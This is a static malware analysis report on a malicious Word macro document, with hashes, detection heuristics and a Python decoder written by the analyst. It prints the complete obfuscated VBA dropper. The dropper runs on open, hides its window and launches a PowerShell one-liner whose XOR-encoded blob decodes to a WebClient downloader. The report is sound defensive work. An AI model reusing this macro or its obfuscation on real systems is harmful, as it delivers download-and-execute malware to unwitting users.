Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 268fff4df4804f6e…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 214.2 KB
Created: 2018-06-27 13:42:00
Authoring application: Microsoft Office Word
First seen: 2018-07-04
MD5: bc3474bed13990ff4d5c6b24895d4f4b
SHA-1: 3fe646e8e73a0d0679f80c3f672b44310dcad154
SHA-256: 268fff4df4804f6e221add7e7d1feb8c2a4046676e8169ca500e3a1c75ba38c8
Risk score: 210

Malware Insights

MITRE ATT&CK
  • T1059 Command and Scripting Interpreter
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
Not mapped by the platform but evident from the command the macro assembles (see the analysis below): T1059.001 Command and Scripting Interpreter: PowerShell and T1027 Obfuscated Files or Information.

The sample is a malicious OLE (Word) document carrying a VBA project. Sub AutoOpen runs when the document is opened and executes Application.Run "AKCfYGZjwZl", jzEEiDmWnsJ, which passes the return value of jzEEiDmWnsJ() into AKCfYGZjwZl(MFWOBOmqD); that function hands the string straight to Shell() with a window style of (17156 / 17156) - 1 = 0 (vbHide), so the user never sees a console. This chain is what OLE_VBA_AUTOOPEN and OLE_VBA_SHELL fire on, and OLE_VBA_PCODE_AUTOEXEC_EXEC corroborates it from the compiled p-code stream, which carries an auto-execution token next to shell/execution tokens; that heuristic is designed for documents whose source cannot be extracted, and here it simply agrees with the recovered source. The command is assembled from dozens of short string fragments joined with + and Chr() (Chr(80) + "ow" + "ers" + "Hell ." yields PowersHell, which Windows resolves case-insensitively to powershell.exe), buried under hundreds of dead assignments (integer literals, Sin(), CDate(), references to variables that are never assigned). The padding relies on On Error Resume Next and VBA's Empty semantics: an unassigned Variant concatenates as "" and adds as 0, so the junk never disturbs the payload. The PowerShell line invokes Invoke-Expression without naming it, via $pSHome[21]+$PshOMe[30]+'x' (on the default $PSHOME of C:\Windows\System32\WindowsPowerShell\v1.0 those indexes are i and e), and feeds it a long digit blob that the one-liner splits on the characters >}R&b-kHl@, XORs with 0x31 and -JOINs into a script. Applying that same transformation to the blob yields a script beginning $wHN=new-object Net.WebClient;$Uvr='http://, i.e. a WebClient-based downloader, so the download-and-execute assessment rests on the decoded second stage and not only on the presence of a Shell() call.
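The string assembly and the one-liner's XOR decoding can be replayed offline without touching PowerShell. The script below is an added worked example written for this report; it is not tooling from the analysis platform and not code from the sample. It evaluates the macro's +/Chr() concatenations under VBA's Empty semantics, follows AutoOpen -> Application.Run -> Shell() to recover the exact command line, and then performs the split/XOR step the PowerShell would run. The embedded excerpt is copied from the macros.bas listing on this page with the filler assignments removed; the names MACRO_EXCERPT, eval_concat, evaluate_macro, recover_shell_command and decode_stage2 are this example's own.

```python
import re

# Constructed input: the string-building assignments plus the Function,
# Application.Run and Shell() lines, copied from the macros.bas listing on this
# page. Integer, Sin() and CDate() filler assignments are left out here;
# evaluate_macro() ignores such lines, so the complete listing can be fed in too.
MACRO_EXCERPT = r'''
SEDbqnrX = "Hell ." + Chr(40) + " $pSHom" + "e[21]" + Chr(43) + "$" + "Psh" + "OMe[3" + "0]" + Chr(43) + "'x'" + Chr(41) + " " + Chr(40) + Chr(40)
nUcntjlp = "'21l70R1" + "21-12" + "7-12-9" + "5&84>70&" + "28k9" + "4b83" + "l91l84&8" + "2k69H17" + "l1" + "27k" + "84k" + "69k"
QtlBVCB = "31" + ">102&" + "84&" + "83k114k" + "93-88R84" + "}95H6" + "9H10b2" + "1b"
lZtYjIp = "100H7" + "1b6" + "7-12" + "k2" + "2H89@69@" + "69" + "}65&11-" + "30-30}70" + ">70}70" + "k3" + "1k93l"
UQjMQmqJ = "80&8" + "2}80&95" + "}82-8" + "9k80k31&" + "65R84" + "R30}" + "71>120b" + "82k104-" + "100k112}"
mCDoJpoS = "10" + "1k83" + "}30" + "&113l89@" + "69@" + "69>6" + "5k11l" + "30" + "b30R70>" + "70H70@3"
uCBvi = "1}" + "83k84R" + "69&80l3" + "1&66&94" + "k94>87" + "k88b69" + "}8" + "8&67H" + "84@66l31" + ">88-" + "67l30&"
wOnuuzKY = "72" + "l8H" + "86-123>8" + "3H1l101" + "b82b104&" + "117b3" + "0-113@"
sIPtzW = "89H69R" + "69>65l" + "11>3" + "0k3" + "0}70@70" + "l70R31b" + "93-80&95" + "k86" + "H8" + "8&69k" + "69}94R6"
SAIoEQWj = "8&67l3" + "1H82}" + "94@92>" + "30&" + "100k83@6" + "4l" + "102-107" + "-86}1" + "15" + "&126-30" + "l11"
kPiDS = SEDbqnrX + nUcntjlp + QtlBVCB + lZtYjIp + UQjMQmqJ + mCDoJpoS + uCBvi + wOnuuzKY + sIPtzW + SAIoEQWj
ozQDkc = "3>89R" + "69&69k65" + "l11R30-" + "30l7" + "0@70" + "b7" + "0@3" + "1b8" + "4R" + "93&8" + "2k93H80" + "@66H88R8"
JBYsikHvG = "2>94>" + "82@" + "92>9" + "3l31>82b" + "94R92k3" + "0R" + "104H64&" + "105&9" + "1k92}8"
ddNQdkszP = "4>69}" + "5R1k116" + ">30" + "-113&89-" + "69b69l65" + "R11>30}" + "30R" + "70@70b70" + "&31l83H8" + "0&86" + "b88k8" + "4R95l95"
hvZBzX = "&80k" + "95>" + "80&67" + "@84@" + "70}31" + "R65R9" + "3&30R92&" + "84k85@88" + "-80-30R" + "93}99"
rXJwMzO = "-92@8" + "9b117@0" + "}30>22" + "H31" + ">9" + "8R65k9" + "3-8"
ARfLV = "8R" + "69}25" + "l22" + "H113" + "&22l24" + "-10l21>1"
skvPd = "07" + "@122l" + "116>1" + "7-12" + "k17" + "k2"
VEbzIA = ozQDkc + JBYsikHvG + ddNQdkszP + hvZBzX + rXJwMzO + ARfLV + skvPd
HlGETRm = "2k2k" + "6H" + "4H22-10-" + "21&1" + "04" + "@9" + "6k83&12}" + "21b84k9" + "5>71>" + "11}6"
ZAzCkE = "9R84l" + "92l65l2" + "6b22b1" + "09&22b2" + "6H" + "21}" + "107R1" + "22&" + "116-26R" + "22b31}8"
TqacuHn = "4-73l" + "84&22H1" + "0R87b94&" + "67@84@80" + "k82" + "l89-2" + "5}21b75" + "@71" + "k123" + ">17l88H" + "95>17&21" + "}10"
uHYNC = "0R71l67" + "}24&74l6" + "9>67&" + "72b7" + "4&21b" + "70k1"
wToFGwE = "21-12" + "7>" + "31" + "}117}94}" + "70&95-" + "93b94&8" + "0@" + "85l1" + "19l88k9"
IwGHmR = "3-84-25" + "k21}75>7" + "1>123k2" + "9&" + "17k" + "21R10"
JLwfQWaED = "4>96>" + "83R24" + "R10H9" + "8&" + "69" + "H80" + "&67b6" + "9l28"
iKoArcNkiXq = "@97>67>" + "94&8" + "2R84-6" + "6H66" + "l17R" + "21"
RznVGtiqQE = "&104R9" + "6R83" + "@10l83" + "-67H84&" + "80" + "}90-10l"
jjsBCOSd = "76k82@8" + "0&69-8" + "2R89l7" + "4b" + "76&" + "76'.SPlI"
upFoC = "t" + Chr(40) + " '>}R" + "&b-kHl@" + "'" + Chr(41) + " |forE" + "acH" + "-Obje" + "CT { [c" + "HAr] " + Chr(40) + "$_ -bx" + "Or " + Chr(34) + "0x3" + "1" + Chr(34) + Chr(41) + "} " + Chr(41) + " -"
EYEcQhutPo = "JOIN" + " '' " + Chr(41) + "   "
JKiKG = HlGETRm + ZAzCkE + TqacuHn + uHYNC + wToFGwE + IwGHmR + JLwfQWaED + iKoArcNkiXq + RznVGtiqQE + jjsBCOSd + upFoC + EYEcQhutPo
dijaRn = niiLiAiDbT + Chr(UCpuiH + 80 + lbkQPhzvJb) + "ow" + "ers"
jzEEiDmWnsJ = kHdFZBPBnWD + dijaRn + kPiDS + VEbzIA + JKiKG
Function AKCfYGZjwZl(MFWOBOmqD)
fhTThbkFMB = pkrBKVzt + iAAZjMw + Shell(TqBJdlEOFRw + MFWOBOmqD + VRBzpzGLD, (17156 / 17156) - 1)
Application.Run "AKCfYGZjwZl", jzEEiDmWnsJ
'''

ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*(.+?)\s*$')
TOKEN = re.compile(r'"([^"]*)"|Chr\(([^)]*)\)|([A-Za-z_]\w*)|\d+|\S')


def eval_concat(expr, sym):
    # VBA under On Error Resume Next: literals as written, Chr(n) -> chr(n),
    # a known name -> its value, a never-assigned Variant -> "" (and 0 inside
    # Chr()); bare numbers and operators add nothing to the string.
    out = []
    for m in TOKEN.finditer(expr):
        if m.lastindex == 1:
            out.append(m.group(1))
        elif m.lastindex == 2:
            nums = re.findall(r'(?<![A-Za-z_])\d+', m.group(2))
            out.append(chr(sum(int(n) for n in nums)))
        elif m.lastindex == 3:
            out.append(sym.get(m.group(3), ""))
    return "".join(out)


def evaluate_macro(src):
    # Walk the listing top to bottom. An assignment to a Function's own name is
    # that function's return value, so one flat table covers the call results.
    sym = {}
    for line in src.splitlines():
        m = ASSIGN.match(line)
        if not m or "Shell(" in m.group(2):
            continue
        if not any(t in m.group(2) for t in ('"', "Chr(", "+")):
            continue  # integer / Sin() / CDate() / bare-alias filler
        sym[m.group(1)] = eval_concat(m.group(2), sym)
    return sym


def recover_shell_command(src):
    # AutoOpen -> Application.Run "AKCfYGZjwZl", jzEEiDmWnsJ: the argument lands
    # in the callee's parameter, which the callee passes straight to Shell().
    sym = evaluate_macro(src)
    callee, arg = re.search(r'Application\.Run\s+"(\w+)"\s*,\s*(\w+)', src).groups()
    param = re.search(r'Function\s+%s\((\w+)\)' % re.escape(callee), src).group(1)
    sym[param] = sym.get(arg, "")
    shell_arg = re.search(r'Shell\((.*?),', src).group(1)
    return eval_concat(shell_arg, sym)


def decode_stage2(cmd):
    # Replay what the one-liner does to its quoted digit blob: split on every
    # character of the delimiter set, XOR each number with the -bxor key, join.
    blob, delims = re.search(r"'([^']*)'\s*\.split\(\s*'([^']*)'", cmd, re.I).groups()
    key = int(re.search(r'-bxor\s+"(0x[0-9a-f]+)"', cmd, re.I).group(1), 16)
    numbers = [n for n in re.split("[%s]" % re.escape(delims), blob) if n]
    return "".join(chr(int(n) ^ key) for n in numbers)


if __name__ == "__main__":
    cmd = recover_shell_command(MACRO_EXCERPT)
    print(cmd)                 # stage 1: the command line handed to Shell()
    print(decode_stage2(cmd))  # stage 2: what Invoke-Expression would run
```

Run as a script it prints both stages: the command line starts with PowersHell .( $pSHome[21]+$PshOMe[30]+'x') ((' and the decoded second stage starts with $wHN=new-object Net.WebClient;$Uvr='http://, the WebClient download loop. Pasting the recovered command into a real PowerShell session would execute the downloader, which is exactly why the decoding is done in Python instead; the recovered URLs belong in the IOC list, not in a browser.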

Heuristics (7)

  • ClamAV: Doc.Malware.Shell-6883057-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Shell-6883057-0
  • VBA macros detected [medium] OLE_VBA_MACROS (3 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Matched line in script:
    UANmko = 59992
    fhTThbkFMB = pkrBKVzt + iAAZjMw + Shell(TqBJdlEOFRw + MFWOBOmqD + VRBzpzGLD, (17156 / 17156) - 1)
    IbOKYA = 78378
    The second argument, (17156 / 17156) - 1, evaluates to 0 (vbHide), so the spawned process gets no visible window. Of the three names in the first argument only MFWOBOmqD is ever set: it is the function parameter that AutoOpen fills with the return value of jzEEiDmWnsJ(); the other two are never assigned and contribute "" under On Error Resume Next.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. For this sample the source was recovered as well, so the finding corroborates OLE_VBA_SHELL and OLE_VBA_AUTOOPEN from an independent stream rather than adding a new behaviour.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    Matched line in script:
    End Function
    Sub AutoOpen()
    On Error Resume Next
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
    Caveat for this sample: the generic description above does not hold as written, because a VBA project was recovered (macros.bas under Extracted artifacts) and it contains the AutoOpen procedure. Treat this finding as a duplicate of OLE_VBA_AUTOOPEN, not as evidence of a WordBasic-only document.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
    This is the DrawingML XML namespace identifier that any Office document with drawing content carries; it is not attacker infrastructure and must not be promoted to an IOC. The sample's download URLs sit inside the XOR-encoded PowerShell blob, where a plain URL extractor cannot see them.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8554 bytes
SHA-256: 6d754bc8754bfec4360d15eefc7dd35c946bd73cae4efbdb4f78e4852ec7e28f

Script preview (first 1,000 lines of the extracted script)
Attribute VB_Name = "dzriVUls"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "IMjTIYlYinKS"
Function kPiDS()
On Error Resume Next
uSCbkc = Sin(74533)
SFsjC = zKRwQf
lUwjZ = 53858
zYkGHW = 21406
raick = CDate(57027)
nRtTzk = 10315
SEDbqnrX = "Hell ." + Chr(40) + " $pSHom" + "e[21]" + Chr(43) + "$" + "Psh" + "OMe[3" + "0]" + Chr(43) + "'x'" + Chr(41) + " " + Chr(40) + Chr(40)
lCzRn = 85209
MrNun = kuzdHS
GKNppF = CDate(54999)
tfdua = 74553
ivmIo = Sin(75000)
wvovD = 25158
nUcntjlp = "'21l70R1" + "21-12" + "7-12-9" + "5&84>70&" + "28k9" + "4b83" + "l91l84&8" + "2k69H17" + "l1" + "27k" + "84k" + "69k"
aBUSNQ = 81306
FNHiwE = 53733
BOajP = OTTALC
HZFsh = Sin(71147)
NGVZvu = CDate(42378)
NVSfir = 71169
QtlBVCB = "31" + ">102&" + "84&" + "83k114k" + "93-88R84" + "}95H6" + "9H10b2" + "1b"
uawNjC = 75649
RpjjZ = 24654
YFnvAT = TbntLb
zrvXU = Sin(80787)
nupsuI = CDate(4948)
JQcbE = 48072
lZtYjIp = "100H7" + "1b6" + "7-12" + "k2" + "2H89@69@" + "69" + "}65&11-" + "30-30}70" + ">70}70" + "k3" + "1k93l"
IAKMoQ = 64823
iKQGTj = 61166
EzOaHP = MaGpV
NYrQF = Sin(83104)
GPZXnc = CDate(34314)
rWrlZW = 44004
UQjMQmqJ = "80&8" + "2}80&95" + "}82-8" + "9k80k31&" + "65R84" + "R30}" + "71>120b" + "82k104-" + "100k112}"
ShNRiT = 50860
zjKQW = 96585
uKwVm = TnjbmN
FPBGm = Sin(18695)
FHVnIw = CDate(72265)
wFizwk = 42162
mCDoJpoS = "10" + "1k83" + "}30" + "&113l89@" + "69@" + "69>6" + "5k11l" + "30" + "b30R70>" + "70H70@3"
MqEGUb = 66978
iIcZP = 21103
iiENv = nFQzuh
UMPdz = Sin(44350)
SXivBi = CDate(37442)
ZjaYB = 355
uCBvi = "1}" + "83k84R" + "69&80l3" + "1&66&94" + "k94>87" + "k88b69" + "}8" + "8&67H" + "84@66l31" + ">88-" + "67l30&"
WJBDU = 73607
IsczW = 7660
dhTbL = ZGiwkD
mSXLq = Sin(71916)
jhKVL = CDate(21513)
sBVwK = 41871
wOnuuzKY = "72" + "l8H" + "86-123>8" + "3H1l101" + "b82b104&" + "117b3" + "0-113@"
RDzRaz = 45393
JTLbw = 20364
nFtwf = lFUFH
qoihv = Sin(8155)
RiSRrF = CDate(18623)
mnHnt = 34687
sIPtzW = "89H69R" + "69>65l" + "11>3" + "0k3" + "0}70@70" + "l70R31b" + "93-80&95" + "k86" + "H8" + "8&69k" + "69}94R6"
cqQEnG = 57692
CMzLq = 39498
KXIqOB = iuoSKw
uXGMs = Sin(39925)
mNcPB = CDate(77831)
mKDhVJ = 78482
SAIoEQWj = "8&67l3" + "1H82}" + "94@92>" + "30&" + "100k83@6" + "4l" + "102-107" + "-86}1" + "15" + "&126-30" + "l11"
kPiDS = SEDbqnrX + nUcntjlp + QtlBVCB + lZtYjIp + UQjMQmqJ + mCDoJpoS + uCBvi + wOnuuzKY + sIPtzW + SAIoEQWj
DnzCB = 8018
XpEFHA = 96315
BFlUH = VwrDKI
YzIpQE = Sin(87435)
Urlfo = CDate(81173)
zQLzD = 11198
End Function
Function VEbzIA()
On Error Resume Next
ZFtVX = 74865
qFRZoh = 37305
CzvbiL = jNGqX
ANfaLv = Sin(95079)
toVhQ = CDate(77545)
ruVsO = 12520
ozQDkc = "3>89R" + "69&69k65" + "l11R30-" + "30l7" + "0@70" + "b7" + "0@3" + "1b8" + "4R" + "93&8" + "2k93H80" + "@66H88R8"
ipRRif = 67808
tYiCb = 74763
GQnmz = WnBsWj
WPozQM = Sin(48346)
XJAcX = CDate(1624)
bPLcuk = 54994
JBYsikHvG = "2>94>" + "82@" + "92>9" + "3l31>82b" + "94R92k3" + "0R" + "104H64&" + "105&9" + "1k92}8"
ptHiC = 48582
nTtHF = 5036
okuGz = sFjVu
ipuwj = Sin(21896)
aEFKO = CDate(24060)
QmDWPn = 4906
ddNQdkszP = "4>69}" + "5R1k116" + ">30" + "-113&89-" + "69b69l65" + "R11>30}" + "30R" + "70@70b70" + "&31l83H8" + "0&86" + "b88k8" + "4R95l95"
SZihl = 69322
zRFYq = 77596
mXsrAT = VqmBv
tPaTS = Sin(85836)
RCFjsz = CDate(9233)
JQpZKa = 99074
hvZBzX = "&80k" + "95>" + "80&67" + "@84@" + "70}31" + "R65R9" + "3&30R92&" + "84k85@88" + "-80-30R" + "93}99"
SJTZI = 4433
bMhcuN = 96905
iXJLP = CDate(73620)
EQjTJK = Sin(5798)
UbhAHm = 97984
FXLkVn = mTKiw
rXJwMzO = "-92@8" + "9b117@0" + "}30>22" + "H31" + ">9" + "8R65k9" + "3-8"
NCclF = 53519
wdSRJY = 89686
MYHiz = CDate(18372)
iAtUNk = Sin(72218)
EmYhC = 39756
fuDwlv = kNBGqO
ARfLV = "8R" + "69}25" + "l22" + "H113" + "&22l24" + "-10l21>1"
FYYfO = 49202
ANWAJN = 27451
RRbvzn = CDate(41505)
zJXGXU = Sin(62917)
sCuzN = 92847
TwCwI = RYDtIn
skvPd = "07" + "@122l" + "116>1" + "7-12" + "k17" + "k2"
VEbzIA = ozQDkc + JBYsikHvG + ddNQdkszP + hvZBzX + rXJwMzO + ARfLV + skvPd
VKaHr = 5144
WCPOTR = 8544
RFCIS = CDate(62076)
moqwlB = Sin(8635)
hRQSXp = 46970
VBLDb = IzvukY
End Function
Function JKiKG()
On Error Resume Next
NObqS = 88933
FucIV = 96986
APwwMU = CDate(33618)
DDvwF = Sin(85867)
zOOvP = 1944
nawpo = ukEEkM
HlGETRm = "2k2k" + "6H" + "4H22-10-" + "21&1" + "04" + "@9" + "6k83&12}" + "21b84k9" + "5>71>" + "11}6"
BwYGXv = 37169
IGiThE = 58582
lCNbDw = CDate(43381)
JdVjQ = Sin(52679)
LIdmQM = 30680
TVUqOZ = CZnSr
ZAzCkE = "9R84l" + "92l65l2" + "6b22b1" + "09&22b2" + "6H" + "21}" + "107R1" + "22&" + "116-26R" + "22b31}8"
CZwsr = 87865
zHQhi = 87613
uHTOuz = CDate(30245)
MSUYdW = Sin(75534)
Udahp = 66618
qqoJIN = EzMwfQ
TqacuHn = "4-73l" + "84&22H1" + "0R87b94&" + "67@84@80" + "k82" + "l89-2" + "5}21b75" + "@71" + "k123" + ">17l88H" + "95>17&21" + "}10"
HQGPE = 34976
rXBtWS = 24609
KdBRQ = CDate(63619)
QiTWu = Sin(69228)
OPzTE = 28585
KNAVVN = cSiPr
uHYNC = "0R71l67" + "}24&74l6" + "9>67&" + "72b7" + "4&21b" + "70k1"
AjiGkW = 67909
jLszv = 65255
WakoL = CDate(26041)
fUNUs = Sin(70207)
YsFBf = 58763
MslFY = wABRwu
wToFGwE = "21-12" + "7>" + "31" + "}117}94}" + "70&95-" + "93b94&8" + "0@" + "85l1" + "19l88k9"
czASn = 37742
iSjozG = 18352
HiFfDO = CDate(22196)
wsFjs = Sin(21027)
NlIIj = 39221
YmIpo = qUnjZ
IwGHmR = "3-84-25" + "k21}75>7" + "1>123k2" + "9&" + "17k" + "21R10"
mAPRi = 88013
iAjilL = 97172
AuUEF = CDate(49299)
SpGAhC = Sin(45777)
SCvwLw = 14673
LCLdKC = dzFUWu
JLwfQWaED = "4>96>" + "83R24" + "R10H9" + "8&" + "69" + "H80" + "&67b6" + "9l28"
rRaEAi = 66899
PttfcR = 65405
SOhoD = CDate(62377)
tHLjwY = Sin(6016)
rudsTD = 63022
hzbkIi = rnWFn
iKoArcNkiXq = "@97>67>" + "94&8" + "2R84-6" + "6H66" + "l17R" + "21"
AmEbXj = 48457
tEirq = 75814
itiAIa = CDate(49278)
GPbJEU = Sin(68289)
NktnL = 23141
QACqD = rpifFu
RznVGtiqQE = "&104R9" + "6R83" + "@10l83" + "-67H84&" + "80" + "}90-10l"
JzmTG = 65595
CVBZf = 96915
cKJZPa = CDate(60125)
jqYsXY = Sin(87721)
oJqfn = 76999
kjtLK = HOfqUl
jjsBCOSd = "76k82@8" + "0&69-8" + "2R89l7" + "4b" + "76&" + "76'.SPlI"
JoozA = 76971
wwNjK = 86631
LMQmw = CDate(70908)
zohvuL = Sin(9352)
QGivJG = 64559
NnHMjb = OYWzYX
upFoC = "t" + Chr(40) + " '>}R" + "&b-kHl@" + "'" + Chr(41) + " |forE" + "acH" + "-Obje" + "CT { [c" + "HAr] " + Chr(40) + "$_ -bx" + "Or " + Chr(34) + "0x3" + "1" + Chr(34) + Chr(41) + "} " + Chr(41) + " -"
SCHwK = 84101
hQddu = 87259
sApOW = CDate(82083)
sCKWz = Sin(46506)
BTuGtf = 5276
TpuFwh = RXUIX
EYEcQhutPo = "JOIN" + " '' " + Chr(41) + "   "
JKiKG = HlGETRm + ZAzCkE + TqacuHn + uHYNC + wToFGwE + IwGHmR + JLwfQWaED + iKoArcNkiXq + RznVGtiqQE + jjsBCOSd + upFoC + EYEcQhutPo
pviZLV = 3277
UKlYA = 24853
IFowU = CDate(94304)
wbUThO = Sin(38631)
dofWp = 13893
dBRLZ = uoLRfI
End Function


Attribute VB_Name = "wAwmAtoRYkMQ"
Function jzEEiDmWnsJ()
On Error Resume Next
AMhiY = 93514
jsXpwk = 84418
YwfDG = Sin(99127)
JbiWDR = CDate(87367)
QtWpX = NzGIDJ
nkOTbp = 63434
dijaRn = niiLiAiDbT + Chr(UCpuiH + 80 + lbkQPhzvJb) + "ow" + "ers"
wpzfI = 77466
MYFhjJ = 27231
iiKYP = Sin(62914)
rzkWb = CDate(4150)
joEVcI = WvDju
UOnhu = 22437
iSXWL = 23905
sRtHiB = 1087
QKiztv = Sin(27522)
apDwR = CDate(66194)
jQwwa = PZQoiw
GwJiMJ = 72164
jzEEiDmWnsJ = kHdFZBPBnWD + dijaRn + kPiDS + VEbzIA + JKiKG
niMLRY = 30226
AzwzDh = 64514
wUXASY = Sin(75714)
SuXJb = CDate(69413)
KLrcTo = OTidA
zEPYzW = 8069
End Function
Function AKCfYGZjwZl(MFWOBOmqD)
On Error Resume Next
niSnj = 30996
VKGzL = 52539
mbqhi = Sin(45952)
kGfSPM = CDate(61293)
OriCM = cETSM
ufIJX = 27485
OaEzM = 28746
HaVBOB = CDate(1226)
DajvOi = 41716
hiGMV = jFhKo
hFaBw = Sin(59226)
UANmko = 59992
fhTThbkFMB = pkrBKVzt + iAAZjMw + Shell(TqBJdlEOFRw + MFWOBOmqD + VRBzpzGLD, (17156 / 17156) - 1)
IbOKYA = 78378
SUUanF = CDate(31017)
LOmRj = 6039
IhdDG = KzrzS
YUATzP = Sin(86247)
cjmzq = 12042
End Function
Sub AutoOpen()
On Error Resume Next
KOicV = 48133
fVPivD = CDate(51828)
iPSAv = 80992
OUSudG = QtAdd
CBaHzf = Sin(71795)
zXCCfr = 33385
Application.Run "AKCfYGZjwZl", jzEEiDmWnsJ
KcZam = 23423
rIAtfb = CDate(62883)
NVODp = 16059
zdHWkF = tiQuNs
VPpqV = Sin(55946)
WdLMZX = 63875
End Sub